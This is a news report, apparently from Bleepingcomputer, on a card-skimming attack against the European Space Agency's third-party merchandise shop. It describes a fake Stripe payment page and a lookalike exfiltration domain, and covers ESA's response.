The European Space Agency’s (ESA) official online shop was the victim of a cyberattack.
Hackers injected a malicious JavaScript script that replaced the legitimate Stripe payment page with a counterfeit one during the checkout process.
ESA, with its €10 billion budget and mission to push the boundaries of space exploration, licenses its web store to sell branded merchandise. However, the shop is currently offline, displaying a message that it is “temporarily out of orbit.”
The breach was first identified by e-commerce security firm Sansec, which discovered the malicious script yesterday. The script, designed to steal customer information—including payment card data—was integrated at the final stage of purchases.
The hackers used a deceptive technique by registering a domain with a name identical to the ESA shop but with a different top-level domain (TLD). While ESA’s official store operates on “esaspaceshop.com,” the attackers used “esaspaceshop.pics” to exfiltrate data.
The malicious script, embedded within the ESA store’s source code, obfuscated HTML from the Stripe SDK to render a convincing but fraudulent payment page. The fake page appeared legitimate to customers since it was served directly from the ESA store.
Sansec warned that the store’s integration with ESA systems could potentially compromise the agency’s employees as well. Source Defense Research, a web application security firm, corroborated Sansec’s findings and captured evidence of the fake payment page.
ESA’s Response
While the fake payment page is no longer active, the malicious script remains visible in the store’s source code. When reached for comment, ESA clarified that the compromised shop is not hosted on its infrastructure and that the agency does not manage its data. A simple WHOIS lookup confirmed this separation, as ESA’s main domain (esa.int) and the web store domain have distinct contact details.
(via: Bleepingcomputer)
